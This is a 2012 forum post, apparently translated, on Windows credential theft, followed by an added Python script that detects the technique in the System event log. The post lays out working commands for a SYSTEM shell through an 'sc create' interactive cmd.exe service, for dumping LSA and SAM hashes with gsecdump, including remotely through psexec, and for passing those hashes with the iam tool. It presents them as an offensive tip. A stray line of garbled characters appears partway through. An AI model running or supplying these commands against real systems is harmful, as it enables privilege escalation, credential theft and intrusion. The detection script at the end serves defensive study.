Hash injection attack
Posted on 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM :)

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ]             show help
-a [ --dump_all ]         dump all secrets
-l [ --dump_lsa ]         dump lsa secrets
-w [ --dump_wireless ]    dump microsoft wireless connections
-u [ --dump_usedhashes ]  dump hashes from active logon sessions
-s [ --dump_hashes ]      dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process and so carry out a hash injection attack. The foreigners really are good at this; admins are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, or the ones obtained with gethash, actually never need to be cracked at all; it is just a matter of using the tool. As the original article puts it well: whether the password is set to 4 characters or 127, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
  ~& ]4 e0 i% ]' Z
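The sc create / StartService FAILED 1053 sequence above leaves a recognisable trail in the System log: a Service Control Manager event 7045 (a service was installed) whose image is cmd.exe, followed by a 7009 timeout because cmd.exe never connects back to the SCM while the spawned prompt keeps running. As an added example, not part of the original post or of the Truesec article, here is a small Python check over constructed records in that shape. The sample events, the exact field layout of the 7045 description and the SHELL_IMAGES list are assumptions for illustration, not captured data.

```python
import re

# Constructed sample records, modelled on Service Control Manager events
# 7045 (a service was installed) and 7009 (timeout waiting for the service
# to connect, which is what surfaces as "StartService FAILED 1053").
# These are not real captured logs.
SAMPLE_EVENTS = [
    {
        "id": 7045,
        "desc": (
            "A service was installed in the system.\n"
            "\n"
            "Service Name:  shellcmdline\n"
            "Service File Name:  C:\\WINDOWS\\system32\\cmd.exe /K start\n"
            "Service Type:  user mode service\n"
            "Service Start Type:  demand start\n"
            "Service Account:  LocalSystem"
        ),
    },
    {
        "id": 7009,
        "desc": (
            "A timeout was reached (30000 milliseconds) while waiting for the "
            "shellcmdline service to connect."
        ),
    },
    {
        "id": 7045,
        "desc": (
            "A service was installed in the system.\n"
            "\n"
            "Service Name:  BackupAgent\n"
            "Service File Name:  \"C:\\Program Files\\Backup Agent\\bagent.exe\" /svc\n"
            "Service Type:  user mode service\n"
            "Service Start Type:  auto start\n"
            "Service Account:  LocalSystem"
        ),
    },
]

# Images that make no sense as a long-running service binary but are exactly
# what this trick registers (assumed list, extend to taste).
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "powershell_ise.exe", "rundll32.exe"}

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.MULTILINE,
)
TIMEOUT_RE = re.compile(r"while waiting for the (.+?) service to connect")


def parse_7045(desc):
    """Return the Service* fields of a 7045 description as a dict."""
    return {key: value.strip() for key, value in FIELD_RE.findall(desc)}


def image_basename(file_name):
    """Extract the executable name from a service command line.

    Handles a quoted path containing spaces as well as a bare path followed
    by arguments (as in the cmd.exe /K start example)."""
    file_name = file_name.strip()
    if file_name.startswith('"'):
        end = file_name.find('"', 1)
        exe = file_name[1:end] if end != -1 else file_name[1:]
    else:
        parts = file_name.split()
        exe = parts[0] if parts else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_services(events):
    """Flag 7045 installs whose image is an interactive shell and record
    whether a 7009 timeout followed for the same service.

    Caveat: 7009 carries the display name, which equals the service name
    only when (as with a plain `sc create`) no separate display name was set."""
    timed_out = set()
    for ev in events:
        if ev["id"] == 7009:
            match = TIMEOUT_RE.search(ev["desc"])
            if match:
                timed_out.add(match.group(1))

    findings = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        fields = parse_7045(ev["desc"])
        name = fields.get("Service Name", "")
        command = fields.get("Service File Name", "")
        image = image_basename(command)
        if image in SHELL_IMAGES:
            findings.append({
                "service": name,
                "image": image,
                "command": command,
                "account": fields.get("Service Account", ""),
                "timed_out": name in timed_out,
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_services(SAMPLE_EVENTS):
        print(finding)
```

Run it against exported 7045/7009 events instead of the constructed list; a shell image installed as LocalSystem that then times out is the pattern from the post, and the same shell-as-service heuristic also catches PsExec-style one-off service drops.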